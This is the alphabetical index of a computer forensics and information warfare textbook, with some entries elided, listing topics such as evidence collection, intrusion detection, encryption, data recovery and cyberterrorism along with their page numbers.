A Zip archive that Windows presents as a single
file
...
Index
3COM Corporation, 293
8lgm, 791
12WAR defined, 802
802
...
See also Internet, abuse, detection of
Acceptable level of risk, 791
...
Caruth et al, 319
American Fundware, Inc
...
v
...
See Application service providers
(ASPs) and network security
Assurance, 792
Asynchronous attacks, 792
Attack, 792
Attackers, identifying, 161, 167–172,
186, 453–459
Attacks
archived postings, accessing, 171
data-driven, 107, 797
information, 803
from inside, 161–162
investigating, 97, 586, 658–660
leapfrog, 806
packet-level, 98
passive, 810
reconstructing, 229
responding to, 159–160
technical, 815
types of, 338, 470, 476–477, 504
wireless, 115–116
Attitudes, 792
...
See Surveillance,
electronic
Bulletin board, 794
Bus defined, 794
Business technology, types of, 52–61
...
See Command and control
warfare (C2W)
C3, 794
C3I, 794
C4I (Command, control, communication, and computer intelligence),
495, 794
C4ISR, 794
Cache defined, 795
Call counting, 612
Calling patterns, tracking, 613
Campaign for Defense of Legitimate
Rights (CDLR), 416–417
Card defined, 794
Carnivore software, 528–529, 552
Cartridges, information stored on, 272
Caruth et al, American Bankers Insurance Company of Florida v
...
See Comprehensive emergency
management procedures (CEMP)
Censorship and encryption, 637–638
Center for Democracy and Technology, 711
Central processing unit (CPU), 796
Ceramics, piezoelectric in simulation
of movement, 537
CERT/CC (CERT Coordination
Center), 266, 267, 654, 795
Certificate authorities
described, 262–263
in identity verification, 89
Certified information systems security
professional (CISSP), 173, 174,
175, 675
Certified Internet Webmaster (CIW),
173
CESA (Cyberspace Electronic Security
Act), 494, 552
CFIRP
...
See Computer Forensics
Experiment 2000 (CFX-2000)
CGI-BIN, 795
CGI email, 795
Chain of custody
defined, 247
documentation, 321, 695
establishing, 18, 19, 65
and evidence notebooks, 250
in evidence preservation, 228–229,
236, 251, 255, 679–680
maintaining, 281, 282
Charlemagne Hammer Skins, 420
Chemical agents in terrorism, 402–403,
427–428, 431
Chicago Convention, 596
Chief Information Officers (CIOs)
functions of, 294–296, 299–300
in security policy implementation,
270, 424
Children
exploitation of, evidence gathering
in, 13
protecting, 128, 232, 535
tracking, 564
China
...
See Certified information
systems security professional
(CISSP)
Civil communication in society, 349
Civilian Casualties: The Victims and
Refugees of Information Warfare
Checklist Form, 776
Civilians
in IW, 585–587, 618–619
networks, protecting, 544
Civil litigation
case studies, 723, 724
and computer forensic specialists,
8, 18, 31, 166
electronic evidence in, 20, 74, 279
and email, 10, 319
sources of, 30–31
CIW
...
com, 597
COCOM (Coordinating Committee
for Multilateral Strategic Export
Controls), 638
Code, malicious, 358, 642
Cold boot defined, 795
Cold war mentality, limitations of,
378–379
Collaborations in IW preparation,
375–376
Collaborative Virtual Workplace
(CVW), 543, 544, 545
Collection of biometrics, 142
Command, control, communication,
and computer intelligence (C4I),
495
Command and control warfare (C2W)
applied, 383, 410
described, 380–383, 409, 794
Communications
attacking, 351, 516–517
identifying, 50
and LBS, 551
and psyops, 367
systems in IW, 586
truth in, 348–350
Company private information defined,
85
Comparison/matching of biometrics,
142
Competition Act, 283
Comprehensive emergency management procedures (CEMP), 144
Computer and Internet Security
Resources, 713
Computer Associates International,
Inc
...
American Fundware, Inc,
320
Computer clocks, mechanism of, 289
Computer crime
evolution of, 4, 287, 310
financial gains, average, 5
investigating, 155
overview, 5–6, 154–155, 184
prevalence, 153, 681
regulating, 358–359
resources, 711
Computer Crimes and Technology
Links, 713
Computer evidence defined, 795
...
See Computer crime
Cyberdisarmament, proponents of,
363
CyberEvidence, 783
Cyber forensics
...
See also Information
warfare (IW)
described, 340–341, 380
disadvantages, 341
military strategy in, 350–354,
359–360, 371–374, 376–377,
392–394, 580
D
DARPA agent markup language
(DAML), 374–375
DARPA (Defense Advanced Research
Projects Agency) on IW capabilities, 354, 372–373, 588
Data
ambient, 792
archiving, 198
compression, 180
converting, 304–310
copy process, characteristics of, 250
defined, 797
distribution, impact of, 570–573
duplication/preservation of, 11,
15–16, 163–164, 185
encryption, 51, 64–65 (See also
Encryption)
erasure
case histories, 26–27
discovering, 52, 71, 95, 180
exporting, 106
hiding techniques, 43, 51–52, 71,
178, 206–209, 297–298, 498
identification of, 287–288
persistence, 213, 496
protection measure tips, 488, 683,
706–707
recovery (See Data recovery)
retention in crime investigation,
359
seizure
described, 11, 21, 53
rules of, 230, 715
storage/analysis of, 251–252
testing, 308
and text, structured, 575
unrecoverable, 706
vulnerability of, 628–629
Databases
data mining in, 569–577, 605
files, searching, 307, 308, 309
forensic, for networks, 318–319
hidden, 71
Data-driven attacks defined, 107, 797
Data encryption standard (DES), 631,
632
DataHaven Project Inc Web site url,
421
Data mining, 569–577
Data objects defined, 327
Data recovery
automated, 205–206
backup and, 192–203, 212–213,
243
case studies, 27–28, 304, 717–718,
719
described, 11, 15, 61, 191–192,
203–206, 214, 705–708
of email, 216, 467, 546, 623
exercises, 186
from fax machines, 10, 183
financial records, 10, 278
on hard disks, 7, 496
hidden, 206–209
from laptop computers, 27, 210,
240
on linux systems, 207–209, 213
principles of, international, 329
software for, 496
on Unix systems, 207, 216, 505,
677, 678, 679
Data Recovery Checklist Form,
755–756
Data storage media
duplication of, 14
examination of, 22
Data theft via wireless systems, 116
Data warehouse, stages of, 317,
328
DAT (digital audio tapes) tapes, data
recovery from, 28, 211
Dates, decoding, 70
Datum defined, 797
Daubert standard defined, 237
DBA (Dominant battlespace awareness), 797
DBK (Dominant battlespace knowledge), 797
DDOS attacks
...
See Discovery of electronic
evidence (DEE)
Defense Advanced Research Projects
Agency (DARPA) on IW capabilities, 354, 372–373, 588
Defense information infrastructure
(DII), 797
Defensive counterinformation, 797
Defensive Strategies for Governments
and Industry Groups Checklist
Form, 765–768
Defragment, 707, 797
Degradation of service, 797
Democracy and IW defense, 596–597
Denial of service (DOS) attacks
...
See Digital certificates;
Identity management security
systems
Digital Intelligence Incorporated,
709
Digital Mountain, Incorporated, 784
Digital signatures
authentication
of log files, 248
of software, 259
described, 263
matching, 655–656
penetration, 811
and PKI, 113, 114
RSA standard for, 64
Dig-x utility defined, 168
DII (Defense information infrastructure), 797
Direct Access Memory (DMA), 798
Directed-energy protective measures,
798
Direct information warfare, 798
Directory defined, 798
DIRT-CDS (Data Interception by
Remote Transmission from Codex
Data Systems) described, 52–53
Disaster recovery systems
networks, 112–113
Discount rate defined, 88
Discovery of electronic evidence (DEE)
as litigation tool, 278–281
overview, 277–278, 281
Discovery of Electronic Evidence
(DEE) Checklist Form, 759–760
Disks
...
See Denial of service
(DOS) attacks
DOS operating system, security of, 280
Dow Chemical, 616
Dragonflies, mechanical, 536–538
DRAM (Dynamic random access
memory), 798
Driver defined, 799
Driver firmware, data erasure on, 26
Duplication and Preservation of
Digital Evidence Checklist Form,
757–758
Dutch Shell Group, 295
Dynamic ports, assigning, 72
Dynamic random access memory
(DRAM), 798
E
Echelon, 475, 495, 616, 617
E-commerce investigations, software
for, 46–47
Economic crime defined, 699
Economic espionage
...
See also Electromagnetic bombs
Electronic hardness defined, 510, 516
Electronic jamming, 522
Electronics intelligence (ELINT), 799
Electronics security, 799
Electronic surveillance
...
detection, 120
and privacy, 90, 627–628
public key (See Public key encryption)
purpose of, 628
regulation of, 637–640
satellite (See Satellite encryption
security systems)
symmetric, 630–632
English Civil Evidence Act of 1968, 28,
29
Enhanced 911 (E911), 551, 554, 561
Enhanced integrated drive electronics
(EIDE), 799
Enhanced signal strength (ESS)
method, 560, 563
Enmeshing phenomenon, 473
Entrapment, 800
Environmentalists, terrorism by, 404
Escrowed encryption, 494–495, 597
Essential elements of friendly information, 800
Ethics of information warfare (IW),
590–597, 619–620
Eudora, 68
Event reconstruction
described, 30, 303–304, 309
procedure, 304–305
Evidence
admissibility, 6, 29, 155, 220, 230,
235, 248, 254
authentication, 182
collection
legal requirements, 247–253,
272, 327
methodology, 164–165,
218–219, 224–230, 263
overview, 70, 217–218,
229–231, 309, 684
processing procedures, 39, 42,
58, 177, 221, 239–247,
254–255
services, obtaining, 163–164
copy process, characteristics of, 250
defined, 20
documentary, 183, 278–279, 283
electronic
converting, 304–310
damaging of, 321–323
defined, 327, 700
problems with, 18, 65, 74, 75,
235, 254
procedures, 3, 19, 38, 327,
673–676, 693–695, 700
storing, 37
integrity/security of, 7, 24–25, 41,
98, 106, 258, 268, 307
legal tests for, 21–22, 58–60, 79
notebook, maintaining, 249–251,
321–322, 678
preservation, 17–18, 39, 59, 239,
241, 250, 254, 679–680, 686
proving, 23
rules of, 220–223, 232, 236–238
standards, 237, 320
trace, value of, 10
types of, 20, 219
volatile, 223
Evidence Collection and Data Seizure
Checklist Form, 756–757
Evidence Identification and Retrieval
Checklist Form, 747–748
EvilPing attack, 441
Exculpatory evidence defined, 220, 230
Executable defined, 800
Executive IW-D Oversight Office, 399
Executives
in computer crime commission,
285
in security policy implementation,
270
Exercises, answers to, 725–745
Expansion card defined, 800
Expert witness services, 7, 12, 60, 222
Extortion in cyberspace, 439
Extract defined, 800
Extraction of biometrics, 142
F
Fair Credit Reporting Act, 603, 605
Falun Dafa, 637
Falun Gong, 339–340
FAQs (Frequently Asked Questions),
705–708
Faraday cage, 516
Fast save function, 496
Fax machines, data recovery from, 10,
183
FBI survey 2003 on computer crime
financial impacts, 5
FDIC netforensics home page, 716
FDISK defined, 800
Federal Computer Incident Response
Center (FCIRC), 681–682
Federal Intrusion Detection Network
(FIDNet)
described, 495
and intrusion detection, 384–385
Federal rules of civil procedure on data
seizure, 11
Federal Rules of Evidence on electronic
evidence, 29, 58, 77, 237
Federated model of identity management, 135–137
Feynman, Richard, 540
Fiber-optic connections, bandwidth of,
111, 577–578
Fidelity and Deposit Companies, 599
FIDNet
...
See also
Defragment
Fraud investigations
case histories, 25–26
electronic evidence in, 20, 278
of employees, 154
Fred Cohen and Associates, 709
Fred software, 676
Freedom Network, 652
Free for all links page, 801
Free speech, proliferation of, 438
Friction of war, 801
FrontPage extensions, 801–802
Frost & Sullivan, 655
Frye standard defined, 237
FTP (file transfer protocol)
account defined, 802
anonymous, 792
encryption issues with, 63
Funds, diverting, 79
Fuzzy logic tools in text searching, 179
G
G8 Group, 673, 700
Gateway defined, 119
Ghost accounts in computer sabotage,
663
GIA (Algerian Armed Islamic Group),
416
GIAC
...
, 684
Hard disks
backup/restoration of, 40, 41
copying, 269, 271
data recovery on, 7, 496
examination of, 22, 242–246
shipping, 707–708
Hardware
evidence collection, labeling in,
231–232, 242
failures and backup procedures,
204
requirements
for data conversion, 306, 311
for evidence processing, 321
Hashes
block values, generating, 263–264,
268
in encryption, 263–264, 268, 634,
677
SHA256 (See Secure Hash Algorithm (SHA256))
Head defined, 802
Header of email and Internet tracing,
65–69
Health Insurance Portability and
Accountability Act (HIPPA), 614,
615
Hearsay evidence defined, 20, 219
Heat sink defined, 802
Helsingus, Johann, 651
HERF (High-energy radio frequency)
guns in IW, 363, 444, 445, 509
High Tech Crime Cops, 714
High Tech Crime Investigation Association, 710
Hijacking defined, 802
HIPPA (Health Insurance Portability
and Accountability Act), 614, 615
History defined, 802
Hizb-ut-Tahrir (Islamic Liberation
Party), 417
Holocaust deniers in IW, 419
Homeland security systems described,
143–144, 147
Honeynet described, 668
The Honeynet Project, 530–531, 649,
650
The HoneyPot Project described,
266–267
Honeypotting defined, 226, 668, 669
+host:domain name and hack command defined, 170
Hotspots, locating, 296
Human resources and computer
forensic specialists, 9–10
Hycamtin, 291, 292
Hyperwar defined, 802
I
IBM 3590 drive, data recovery from,
210
IBW (Information-based warfare), 803
ICMP
...
See Information and communication technologies (ICTs)
IDC, 655
IDEA (International Data Encryption
Algorithm), 631
Identification of Data Checklist Form,
760–761
Identify-preserve-analyze-report
model, 686
Identity fraud, prevalence of, 131
Identity management
access, controlling, 133, 150
audits in, 133, 151
digital, aggregation in, 130
Identity management security systems
in authentication, 258–259
described, 129–137, 147
Identity theft
exercises, 150–151
overview, 137–141, 606–609
Identity Theft Hotline contact information, 141
IDW (Information Dominance Warfare), 804
IIW (Information in Warfare), 804
Images
...
See Corporations
Info-niche attacks in netwar, 346, 347
Information
collection, 804
compromise, 804
defined, 360, 803
denial, 804
destruction, 804
dominance, 804
friendly, essential elements of, 800
function, 804
protection, 805
realm, 805
superiority, 805
terrorism, 805
transport, 805
warfare (See Information warfare
(IW))
Information Age defined, 803
Information Age warfare, 803
Information and communication
technologies (ICTs)
applications in IW, 394, 396, 415,
418, 419
C2W and, 420
Information attack, 803
Information-based warfare (IBW), 803
Information Dominance Warfare
(IDW), 804
Information extraction (IE) in data
mining, 576–577
Information infrastructures, importance of, 585–588, 621
Information in Warfare (IIW), 804
Information Operations, 804
Information strategies defined, 408
Information systems (INFOSYS), 805
Information systems warfare (ISW),
805
Information technology
diffusion of, 587
system defined, 360, 366
Information Technology Sharing and
Analysis Center (IT-ISAC) described, 343, 490
Information Warfare: Arsenal of the
Future Checklist Form, 772–775
Information Warfare Arsenal and
Tactics of Private Companies
Checklist Form, 771–772
Information Warfare Arsenal and
Tactics of Terrorists and Rogues
Checklist Form, 769–771
Information Warfare Arsenal and
Tactics of the Military Checklist
Form, 768–769
Information warfare (IW)
...
See Filter_G
software
INTELSAT Convention, 596
International Association of Computer
Investigative Specialists, 648, 710,
714
International Data Encryption Algorithm (IDEA), 631
International Organization on Computer Evidence (IOCE) described,
322, 329
International organizations in IW,
354–359
International Telecommunications
Convention of 1982, 596
Internet
abuse, detection of, 52, 74, 180,
315, 701
authentication on, 259
as Big Brother, 577–578
children, protecting, 128, 232, 535
and cyberterrorism, 417, 420, 424,
460
encryption described, 64
and industrial espionage, 127,
291–296
and privacy awareness, 127
security systems, 84–91, 146, 148
tactical, 815
tracing methods, 65–69, 96
wireless, 579–580
Internet Control Message Protocol
(ICMP), 104, 289
Internet Merchant Account defined, 88
Internet Resources on Technology
Law, 713
Internet Security Systems Incorporated
(ISS), 666
Internet Service Providers (ISPs) and
network security, 480–481,
484–487
Interpact Incorporated, 711
Intrusion detection systems
anomaly-based, 655–656
appliance-based, 656–657
described, 91–99, 146, 148, 149,
157, 315, 329–330, 667–668
firewalls and, 93–94, 148, 149,
325
history of, 384, 653–656
implementing, 163
network signature-based, 655, 668,
669, 697
outsourcing of, 657
and packet sniffers, 528
response in, 160, 323–324
speed of, 656
IOCE
...
See Information Technology
Sharing and Analysis Center (ITISAC) described
IW
...
See Information
warfare (IW)
Kroll Ontrack, Incorporated, 786
L
Ladenese Epistle, 418–419
LAN 802
...
See Location-based services (LBS)
LC Technology, 787
LC Technology International, Incorporated, 786–787
Leads, identifying, 38
Leapfrog attack, 806
Lee, Wen Ho, 434, 452
Legal/court related sites, 714
Legal issues
in computer forensic evidence,
20–21, 58–60, 79, 155, 247–253
in cyberwarfare, 341, 586
evidence
collection, 247–253, 272, 327
overview, 21–22, 58–60, 79
Legislation for IW defensive measures,
493–494
Letter bombs, 807
Liability, demonstrating, 30
Libertarian Party, 422
Liberty virus, 115
+link:domain name command defined, 170
Linux systems
data recovery on, 207–209, 213
file cleansing utilities, 208–209
Litigations, sources of, 30–31
Loc8
...
See Message Digest 5 (MD5)
Measurement and Signal Intelligence
(MASINT) defined, 807
Measurement and Signature Intelligence defined, 807
Media
conversion, 11
previewing, 687–689
Media broadcasts in IW, 345–347
Medical ID cards, 613–615
MEII (Minimum essential information
infrastructure) defined, 807, 808
Memory
copying, 272
dumps and evidence preservation,
42, 77
resident programs, understanding,
180
MEMS (Microelectrical and mechanical systems), 535
Merchant defined, 88
Message defined, 807
Message Digest 5 (MD5)
hash functions in, 634
in PGP, 122, 123
in timekeeping, 291
MessageID described, 67
Metal oxide semiconductor (MOS)
devices in IW, 511
Microbes in IW, 521
Microelectrical and mechanical systems (MEMS), 535
Microsoft and privacy issues, 603
Microsoft Internet Explorer, 604
Microsoft Outlook/Outlook Express,
viruses in, 57
Microsoft Word in crime scene investigation, 238
Microsoft WordPerfect™ in crime
scene investigation, 238
Middle East cyberwars, 441–444, 464
MIE (Military Information Environment) defined, 807, 808
Military computer forensics technology, types of, 36–38
Military deception, 807
Military Information Environment
(MIE) defined, 807, 808
Military information function, 808
Military Information Operations
(MIOs), 360, 446
Military information warfare tactics
(MIWT) described, 376–377, 387
Military operations and information
systems, 587
Military strategy in cyberwarfare,
350–354, 359–360, 371–374,
376–377, 392–394, 580
Military technical revolution (MTR),
808
Minimum essential information
infrastructure (MEII) defined, 807,
808
Mirkin, Chad, 540
Mirror image backup software
...
See also Bit stream
image backups in evidence preservation
Misbehavior in the face of the enemy
defined, 477–478
Missiles and electromagnetic warheads,
514
Misuse detection, 808
Mitnick, Kevin, 422
Mitretek Systems, 713
Mockingbird, 808
Mohammed, Ali, 454, 455, 456
Mohammed, Omar Bakri, 417
Monthly traffic defined, 808
...
hst file, 496
Netscape Navigator, log files in, 496, 604
Netstat command, 679
Net Threat Analyzer software described, 46–47
Netwar
...
See Network Time Protocol
(NTP)
Nuclear weapons
obtaining, 452–453
in terrorism, 402–403, 425–427,
450–451, 545
NutraSweet, intelligence unit of, 293
O
Objective reasoning, threats to, 347,
350, 352, 353, 369
...
Ortega, 248
Odd person out attacks described,
120–121
Offensive counterinformation, 809
Omega Engineering, 664
One-time pad method of encryption,
629–630
The Onion Router Project, 497–498, 653
Onion routing described, 498, 651–652
OODA loop
and C2W, 382–383
defined, 809
Open-source intelligence, 809
Operational intelligence, 809
Operation Desert Storm, 519
Operation Iraqi Freedom, C2W in, 383
Operation Other Than War (OOTW),
590–591, 809
Operations security (OPSEC) defined,
381, 809
Opinion defined, 809
OPLAN 3600, 378
OPSEC (Operations security) defined,
381, 809
Optical networking and IW, 373, 518
Oracle Corporation, 297
Orientation defined, 809
Ortega, O’Connor v
...
SYS in evidence detection,
75
Palestine in cyberterrorism, 441
Parallel warfare described, 393–394
Partitions
...
See also Objective reasoning, threats to
defined, 811
manipulation of, 349, 366
Performance of SANs, 111
Peripherals
changes in, 23
described, 811
Personal assets, destruction of,
597–600
Personal identification numbers
(PINs) and cellular telephony, 611
Personal Locator System (PLS)
applications, 561–564
architecture, 555–556
implementing, 564
overview, 554
technologies, 556–561
PGP
...
See Public key infrastructure
(PKI) systems described
Plagiarism, detecting, 569
Plants as bioterrorism targets, 430–431
PLS
...
org, 710
Pornography viewing
investigating, 232, 255, 287–288,
719
statistics, 165, 241
Port numbers
attack points, common, 661, 669
ranges, 71–72, 78
Position, computing, 559
Post-apocalyptic terrorist groups,
403–404
POST (Power-on self test) defined, 811
Poulsen, Kevin, 422
Pragmatic communication defined,
348–349
Premiums for hacker insurance,
598–599
Pretty Good Privacy (PGP), 64,
122–124, 636
Prevention defined, 94
Principle Forensic Activities Checklist
Form, 748–750
Principle of least privilege defined, 102
Privacy
and biometric systems, 483
encryption and, 90, 627–628
in evidence collection, 248,
267–268, 675
and firewalls, 105–106
and hacker pursuit, 460
and LBS, 550, 563
maintaining, 529–530, 602–603,
627
medical, 613–615
monitoring, 609–613
net systems described, 126–129
policy
enforceability of, 489
key elements of, 132–133,
147
in Windows environments,
566–569
Privacy agreements described, 488–489
The Privacy Foundation, 529–530, 545,
566, 567, 616
Private companies
...
See Psychological operations
(Psyops)
Public information defined, 85
Public key encryption
and cyberterrorism, 424–425
described, 63, 86, 114, 120–121,
147
for IW defensive measures, 494
limitations of, 632–636
message path, 121
in PGP, 124
in timestamping, 291
Public key infrastructure (PKI) systems
described, 113–114, 147
Publisher IDs, 264
Punishment for hacking, 600
Purity Wholesale Grocers, 664
Q
QuickFire attack, 441
R
Radar in cyberterrorism, 451
RadioCamera system, 560
Radio frequency (RF) fingerprinting, 609, 611
RAID (redundant array of independent disks) disks
data recovery from, 211
data storage on, 22, 26
management of, 110–111
RAM (Random Access Memory), 811
Random text displayer described, 812
RC4, 631
Read heads, development of, 540–541
Real evidence defined, 20, 29
Real time audio/video described, 812
Reconstructing Past Events Checklist Form, 761–762
Records, access to, 277–278, 283
ReFLEX two-way paging, 564
Registry, the, 685, 815
Reject all cookies option, 566
Relevancy test of evidence defined, 237
Reliability of SANs, 111
Remailers and encryption, 497
Remediation of IW attacks, 356–357
Renew Data, 788–789
Replay attacks, 290
Reports as evidence, 29, 317
Requirements definition, 685–700
Research in Motion (RIM) wireless technology
evidentiary value of, 69–70
file system in, 70–71
Restoration ecologists, terrorism by, 404
Retina, 662
Retro-virus described, 812
Review questions, answers to, 725–745
Revolution in Military Affairs (RMA), 587, 812
Right-click defined, 812
RIM devices
...
See Rivest, Shamir, and Adleman (RSA) standard
Rules of engagement, 596
Rules of evidence
...
See Systems Administrator Networking and Security (SANS)
SANs
...
, 552, 553
Scavenging defined, 812
SCPAs
...
See Synthesizing Information from Forensic Investigations (SIFI) environment
Signal defined, 814
Signal direction PLS, 556–557
Signal security (SIGSEC), 814
SignalSoft Corporation, 551
Signal strength method, 559–560
Signature matching, 655–656
SIGNCODE
...
See also Packet sniffers described
defined, 814
passwords, obtaining, 552
tools, 527–529, 595
in wireless systems, 116
Sniffit software, 527–528
Snooping tools, 527–529
Social engineering, 376, 663, 814
Societal aspects in cyberspace, 469–470
Socket defined, 815
SODA Project, 443–444
Software
antivirus (See Antivirus software)
for attack detection, 156–157
backdoors, planting, 363
case-management, 282
changes in, 23, 646
copying packages, 269
for data recovery, 496
designing, 47
doomsday, 342
integrity, maintaining, 357
publisher IDs, 264
for risk assessment, 45
for security reviews, 47–50
theft recovery, 53–55, 77
tools, capabilities of, 684
useful sites, 168, 170, 179, 715
vulnerabilities
communication of, 646
hacking, 662
SOS (System of systems) defined, 815
Source addresses, 650–651
Source address spoofing, 650
Soviet Union
...
See Secure Sockets Layer (SSL) encryption
SSID
...
See also Cyberterrorism
information, 805
religious, 463
state-sponsored, 464
Terrorists
cells, disrupting, 457
methodology, 430–433
organization of, 395, 463, 464
profile of, 421–424, 428, 438–439, 645
recruitment of, 458–459
tactics in IW, 415–421, 424–427
Testimonial evidence defined, 20, 219
Testing
evidence, 21–22, 58–60, 79
security, 640–641
of systems, 324–326
Text, searching, 47–50, 178–179, 207, 243–244, 560–577, 685
TextSearch Plus software described, 45, 47–50
TFL:IDS, 657
The Coroner’s Toolkit, 710
Theft defined, 155
Theft recovery software described, 53–55, 77
Thermionic technology and EMP attack, 517
Third-wave warfare, 815–816
Threats, passive, 810
Time bomb described, 816
Time difference of arrival (TDOA) method, 557
Time element deductibles, 599
Time stamps
in authentication, 263–264
in evidence collection, 228, 243, 690
overview, 288–291
Timing attacks, 635
TJPing utility and Internet tracing, 67, 68
Total Recall (Binary Biz North America), 789
Trace evidence, value of, 10
Traceroute command defined, 169
Trade sanctions, evading, 439
Traffic amplification via Web site, 442
Transactions, electronic, demonstrating, 30
TRANSEC (Transmission Security), 816
Trans Union, 607
Trap doors
in cyberterrorism, 508, 521
defined, 816
information, obtaining, 658
Triple DES (Data encryption standard), 631
Trojan horse programs
described, 816
and evidence preservation, 42, 177
in IW, 336, 477, 508, 520, 521, 545, 595
protection from, 56–57, 668
Troll described, 816
TrustE, 489
TUFCOFS, 711
Tunneling defined, 94
Twofish, 631
U
Unallocated file space, 816
UN Convention on Law of the Sea, 596
UNICODE, 688, 690
Unilever, 294, 295
Unintentional emission (UE), detection/tracking of, 513
United States
cyberwarfare, protecting against, 462
IW capabilities of, 357, 365–366, 378, 622
IW preparation status, 335–339, 350–351, 362, 366–367, 423–424, 439, 587
PLS in, 554
on privacy issues in IW, 602
and terrorism, 391–392, 400, 408, 429–432
on weapons availability of enemies, 446–448
UNITY, 443
University of Central Florida-Orlando, 648
University of Delaware Web site url, 290
Unix systems
data recovery on, 207, 216, 505, 677, 678, 679
DNS service on, 324
timekeeping in, 289, 290
Unzip defined, 816
US
...
See also Authentication
Vandal described, 816
Van Eck radiation, suppressing, 513
Vector-space method of text exploitation, 575–576
Vehicles, locating, 554, 573–574
Vendor and Forensic Services Types Checklist Form, 754–755
Vendors in software evolution, 646
Verification
...
See Intrusion detection systems
Vulnerability defined, 817
W
Wal-Mart Stores, 293
War, Act of defined, 591–592
War defined, 817
War dialer defined, 817
War driving/flying defined, 296
Warfare defined, 817
Warm boot defined, 817
Wassenaar Management, 639
Weapons of mass destruction
electromagnetic bombs, 509–510
and IW-D, 401–402, 405
tools, obtaining, 452–453
Weapons of precise disruption, 376
Web-based Telnet, 817
Web bugs in Word documents, 566–569, 583
Web images, copying, 56
Web of Justice Links, 714
Webraska, 551
Web services
access control for, 325–326
and digital identity management, 130–131
Web sites
crime, case histories, 25
defacement of, 443
security of, 662
traffic amplification via, 442
WEP